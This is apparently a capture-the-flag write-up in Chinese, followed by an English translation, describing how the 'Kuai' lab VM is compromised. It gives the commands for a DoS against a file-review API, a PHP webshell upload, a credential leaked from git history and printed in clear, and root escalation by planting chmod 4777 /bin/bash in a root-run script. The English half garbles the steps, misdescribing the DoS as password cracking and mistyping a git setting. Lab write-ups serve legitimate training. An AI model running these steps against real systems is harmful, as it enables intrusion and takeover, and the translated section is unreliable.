mazesec kuai

信息收集

# Nmap 7.95 scan initiated Wed Dec 24 02:48:02 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 192.168.110.98
Nmap scan report for Kuai.lan (192.168.110.98)
Host is up (0.00046s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Maze\xE4\xB8\x8A\xE4\xBC\xA0
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
3000/tcp open  http    Werkzeug httpd 3.1.4 (Python 3.9.2)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/3.1.4 Python/3.9.2
| http-methods:
|_  Supported Methods: HEAD GET OPTIONS
MAC Address: 08:00:27:04:C1:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime guess: 9.769 days (since Sun Dec 14 08:21:29 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 24 02:48:16 2025 -- 1 IP address (1 host up) scanned in 13.83 seconds

80端口是一个上传文件网址。上传的文件在http://192.168.110.98/uploads/

  • 状态: 正在将上传内容发送到审核服务器审核中
  • 只允许上传JPG图片文件

http://192.168.110.98:3000/api是一个使用api审核文件的端口

漏洞分析

http://192.168.110.98:3000/api进行Dos攻击使其瘫痪

上传php文件即可

利用

gobuster dir --url [http://192.168.110.98:3000/](http://192.168.110.98:3000/) --threads 3000 --wordlist /usr/share/wordlists/rockyou.txt后台挂着

上传webshell即可进入shell

www-data@Kuai:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Dec 23 05:12 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
drwxr-xr-x  8 root root 4096 Dec 23 05:13 .git
-rw-r--r--  1 root root  308 Dec 23 05:12 app.py

git泄露

www-data@Kuai:/opt$ git log
fatal: detected dubious ownership in repository at '/opt'
To add an exception for this directory, call:

	git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
fatal: $HOME not set
www-data@Kuai:/opt$ export HOME=/tmp
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git show
commit 937ff3b9ba793ab8e772dc5203f1170629cdfedf (HEAD -> master)
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:13:09 2025 -0500

    a

diff --git a/app.py b/app.py
index 612613f..24b48b9 100644
--- a/app.py
+++ b/app.py
@@ -2,7 +2,7 @@
 from flask import Flask, jsonify

 app = Flask(__name__)
-// tuf: Cbr5Cq1QBS2GHUOGuJrc
+// tuf:********

 @app.route('/')
 def index():

得到Cbr5Cq1QBS2GHUOGuJrc

权限提升

tuf@Kuai:~$ ps -ef
root         353     337  0 01:29 ?        00:00:00 /bin/sh -c python3 /home/tuf/app.py
nano a.py
# 输入import os;os.system('chmod 4777 /bin/bash')
rm app.py
mv a.py app.py

即可

mazesec Kuai

Information Gathering

# Nmap 7.95 scan initiated on Wednesday, December 24, 2025, at 02:48:02, as follows:
# /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 192.168.110.98
Nmap scan report for Kuai.lan (192.168.110.98):
The host is up (latency: 0.00046 seconds).
997 closed TCP ports were not displayed (reset).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Maze
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_  Supported methods: GET, HEAD, POST, OPTIONS
3000/tcp open  http    Werkzeug httpd 3.1.4 (Python 3.9.2)
|_http-title: The site does not have a title (format: text/html; charset: utf-8).
|_http-server-header: Werkzeug/3.1.4 Python/3.9.2
| http-methods:
|_  Supported methods: HEAD, GET, OPTIONS
MAC Address: 08:00:27:04:C1:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose | router
Operating System: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Uptime estimate: 9.769 days (since Sunday, December 14, 2025, 08:21:29)
Network distance: 1 hop
TCP sequence prediction difficulty: 259 (Good luck!)
IP ID sequence generation: All zeros
Service information: Operating system: Linux; CPE: cpe:/o:linux:linux_kernel

Data files were read from: /usr/share/nmap
OS and service detection has been completed. Please report any incorrect results at: https://nmap.org/submit/ .

Nmap results: Scanned 1 IP address in 13.83 seconds; 1 host was found to be up.

Port 80 is used as a file upload URL. The uploaded files are stored at: http://192.168.110.98/uploads/

  • Status: The uploaded content is being sent to an audit server for review.
  • Only JPG image files are allowed to be uploaded.

Port http://192.168.110.98:3000 is used to audit files via an API.

Vulnerability Analysis:

A Dos attack was launched on http://192.168.110.98:3000, causing it to become unavailable. Simply uploading a PHP file can exploit this vulnerability.

Exploitation Steps:

  1. Use gobuster to perform a brute-force attack on the URL: 
    gobuster dir --url http://192.168.110.98:3000/ --threads 3000 --wordlist /usr/share/wordlists/rockyou.txt
    This will attempt to crack the password using the provided wordlist in the background.
  2. Once a valid password is found, a webshell can be uploaded to gain access to the system.

System Details:

  • File structure on the compromised host: 
    www-data@Kuai:/opt$ ls -la
...
app.py: The git repository is exposed, revealing sensitive information.
  1. Git repository issues: 
    www-data@Kuai:/opt$ git log
fatal: Detected dubious ownership in the repository at '/opt'
    To allow access to this directory, you can use: 
    git config --global --add safe_directory /opt
    However, the $HOME environment variable is not set, so you need to set it manually: 
    www-data@Kuai:/opt$ export HOME=/tmp
    Then reapply the configuration: 
    git config --global --add safe_directory /opt
  2. Code snippet from the git repository (revealing a potential exploit): 
    diff --git a/app.py b/app.py
...
from flask import Flask, jsonify
    This code indicates that the Flask framework is being used, and an exploit could be created by manipulating this file.

Privilege Escalation:

tuf@Kuai:~$ ps -ef
root         353     337  0 01:29 ?        00:00:00 /bin/sh -c python3 /home/tuf/app.py

You can modify the app.py file to escalate privileges:

nano a.py
# Add the following line:
import os; os.system('chmod 4777 /bin/bash')

Remove the original app.py file and replace it with the modified one:

rm app.py
mv a.py app.py

This will grant the root user full privileges.